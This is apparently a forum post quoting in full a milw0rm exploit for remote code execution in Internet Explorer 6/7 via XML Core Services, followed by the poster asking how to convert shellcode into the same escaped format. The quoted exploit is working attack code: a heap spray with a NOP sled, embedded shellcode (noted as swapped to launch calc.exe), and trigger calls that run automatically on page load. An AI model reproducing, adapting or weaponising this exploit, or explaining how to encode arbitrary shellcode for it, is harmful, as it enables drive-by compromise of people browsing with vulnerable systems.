<div>For example ,I find This exploit:</div>
<div><a class="style14" href="http://www.milw0rm.com/exploits/2743" target="_blank"><font color="#800080">MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit</font></a></div>
<div><em><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus 2.0//EN"><br><!--<br>MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit<br><br>Author: n/a<br><br>Info:<br><a href="http://blogs.securiteam.com/index.php/archives/721">
http://blogs.securiteam.com/index.php/archives/721</a><br><a href="http://isc.sans.org/diary.php?storyid=1823">http://isc.sans.org/diary.php?storyid=1823</a><br><a href="http://xforce.iss.net/xforce/alerts/id/239">http://xforce.iss.net/xforce/alerts/id/239
</a><br><br>Found in the wild and was pointed out on securiteam's blog (cheers Gadi Evron!)<br><br>Changed up the shellcode so it wouldn't be as evil for the viewers, calc.exe is called.<br><br>/str0ke<br>--><br><br><html xmlns="
<a href="http://www.w3.org/1999/xhtml">http://www.w3.org/1999/xhtml</a>"><br><body><br><object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" ><br></object><br><script>
<br>var obj = null;<br>function exploit() {<br>obj = document.getElementById('target').object;<br><br>try {<br>obj.open(new Array(),new Array(),new Array(),new Array(),new Array());<br>} catch(e) {};<br><br>sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
<br>"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +<br>"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +<br>"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
<br>"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +<br>"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +<br>"%uFF57%u63E7%u6C61%u0063");
<br><br>sz = sh.length * 2;<br>npsz = 0x400000-(sz+0x38);<br>nps = unescape ("%u0D0D%u0D0D");<br>while (nps.length*2<npsz) nps+=nps;<br>ihbc = (0x12000000-0x400000)/0x400000;<br>mm = new Array();<br>for (i=0;i<ihbc;i++) mm[i] = nps+sh;
<br><br>obj.open(new Object(),new Object(),new Object(),new Object(), new Object()); <br><br>obj.setRequestHeader(new Object(),'......');<br>obj.setRequestHeader(new Object(),0x12345678);<br>obj.setRequestHeader(new Object(),0x12345678);
<br>obj.setRequestHeader(new Object(),0x12345678);<br>obj.setRequestHeader(new Object(),0x12345678);<br>obj.setRequestHeader(new Object(),0x12345678);<br>obj.setRequestHeader(new Object(),0x12345678);<br>obj.setRequestHeader
(new Object(),0x12345678);<br>obj.setRequestHeader(new Object(),0x12345678);<br>obj.setRequestHeader(new Object(),0x12345678);<br>obj.setRequestHeader(new Object(),0x12345678);<br>obj.setRequestHeader(new Object(),0x12345678);
<br>}<br></script><br><body onLoad='exploit()' value='Exploit'><br><br></body></html><br></em></div>
<div><em>So,How to covert shellcode to this style :</em></div>
<div><em>sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +<br>"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +<br>"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
<br>"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +<br>"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +<br>"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
<br>"%uFF57%u63E7%u6C61%u0063");</em></div>